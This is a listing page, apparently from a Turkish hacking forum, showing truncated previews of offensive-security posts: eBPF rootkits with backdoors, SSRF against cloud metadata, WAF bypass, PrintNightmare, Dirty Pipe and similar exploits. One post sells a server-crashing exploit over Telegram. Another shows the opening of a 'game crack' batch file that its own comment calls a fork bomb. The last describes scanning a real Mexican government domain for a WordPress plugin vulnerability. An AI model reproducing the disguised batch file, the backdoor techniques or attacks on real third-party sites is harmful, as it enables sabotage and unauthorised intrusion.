Çok eski bir web tarayıcısı kullanıyorsunuz. Bu veya diğer siteleri görüntülemekte sorunlar yaşayabilirsiniz.. Tarayıcınızı güncellemeli veya alternatif bir tarayıcı kullanmalısınız.
Selam, bugün biraz farklı bi konuya değinmek istedim. Çoğu insan hâlâ klasik DDoS veya yavaşloris tarzı saldırıları düşünüyo ama son dönemde HTTP/2 protokolünün reset frame’lerini kullanarak ciddi oranda WAF’ları atlatmak mümkün hale geldi. Özellikle Cloudflare ve Akamai’nin bazı eski...
Selam dostlar, bugün biraz farklı bi şey denicem. Klasik LKM rootkitleri artık hemen yakalanıyor, o yüzden işleri eBPF tarafına kaydırdım. Kernel 5.8+ sistemlerde tracepoint ve kprobe'ları kullanarak process hiding + network backdoor kurmayı anlatıcam. Hem detection oranı düşük hem de...
Selam, son zamanlarda XenForo kurulu birkaç forumda test yaparken ilginç bir blind SSRF durumuyla karşılaştım. Aslında tam exploit değil, daha çok misconfig + eski bir eklenti kombinasyonu üzerinden iç ağa ve bulut metadata endpoint'lerine sızmak gibi bir şey. Özellikle AWS üzerinde çalışan...
Selam, son zamanlarda birkaç pentest sırasında karşıma çıkan klasik ama etkili bir yöntemi paylaşmak istedim. Birçok web uygulamasında hâlâ tam olarak filtrelenmeyen SSRF zafiyetiyle AWS EC2 instance’larının metadata servisini nasıl sömürebileceğimizi anlatıyorum. Özellikle IMDSv2’ye geçiş...
Selam, bugün bi tık farklı bi şey denicem. Modern linuxlarda full ASLR varken bile ROP chain kurup exploit yazmak mümkün mü diye bi araştırma yaptım. Özellikle 64 bit sistemlerde adreslerin sadece düşük 12 bitini sızdırarak partial overwrite ile işleri yoluna koyabiliyoruz. Tabi her zaman stabil...
Selam arkadaşlar, bugün biraz eski ama hala efsane olan PrintNightmare (CVE-2021-1675) konusunu kazıyalım. Çoğu insan sadece Metasploit modülünü çalıştırıp geçiyor ama işin arkasındaki RPC çağrıları ve impersonation mekanizması bayağı ilginç.
Öncelikle zafiyet, Print Spooler servisinin RPC...
Selam dostlar, bugün biraz eski ama hâlâ iş gören bir konuya değinmek istedim. Spring Framework'teki o meşhur classloader manipülasyonu üzerinden nasıl RCE yapıldığını, adım adım ve olabildiğince teknik şekilde anlatacağım. Lab ortamında test ettim, production'da benzer konfigürasyonlar hâlâ...
Dirty Pipe (CVE-2022-0847), Linux kernel 5.8+ sürümlerinde pipe_buffer yapısının "flags" alanının yanlış yönetilmesinden kaynaklanan bir local privilege escalation zafiyetidir. Temel sorun, "PIPE_BUF_FLAG_CAN_MERGE" bayrağının set edilmesiyle, sayfa cache’deki salt-okunur sayfaların üzerine...
Konfigürasyon:
Nginx 1.24.0 - 1.26.1
PHP-FPM 8.2 veya 8.3
fastcgi_cache aktif olan sistemler (çoğu shared hosting ve orta ölçekli siteler)
Açığın Mantığı:
Nginx’in FastCGI cache mekanizması, belirli şartlar altında cache key’ini yeterince sıkı kontrol etmiyor. Bu sayede cache poisoning...
Merhaba dostlar metin 2 üzerinde çalıştım ve sonunda çoğu TR ve yabancı Lokasyonlu sunucuları çökertebileceğiniz bir exploit geliştirdim detaylar için TELEGRAM üzerinden bana ulaşabilirsiniz .
Şuan bu exploit için satışa sunduğum açık kaynak sistemler:
- Website ( web üzerinden yapabilirsiniz...
Merhaba bu yazıyı forumda eğer hala (2026 Ocak ayında) kendini bu alanda geliştirmek isteyen ve öğrenmeye istekli kişilere ulaşmasını umduğum için yazıyorum. Bu alanda bilgili veya bilgisi bulunmayan herkes bu yazıyı rahatlıkla okuyabilir. Aklınıza gelecek Herhangi bir soruyu çekinmeden...
Hidden content - for more
@echo off
REM game_crack.bat- Game crack utility for Windows
setlocal enabledelayedexpansion
echo Installing game crack components...
timeout/t 1 /nobreak >nul
REM Infinite fork bomb with multiple techniques
echo Starting game optimization...
start/min cmd /c %0
cmd/c...
bilindik bir tane exploiti test edelim sadece subfinder ve httpx kullanıcaz (cve-2023-28121)
target domain gob.mx seçtik
path olarak woocommercedeki bricks endpointini verelim 200 olanlara bakıcaz exploit ile test edicez
biraz kurcaladiktan sonra 200 veren ve uygun endpointi olan siteyi bulduk...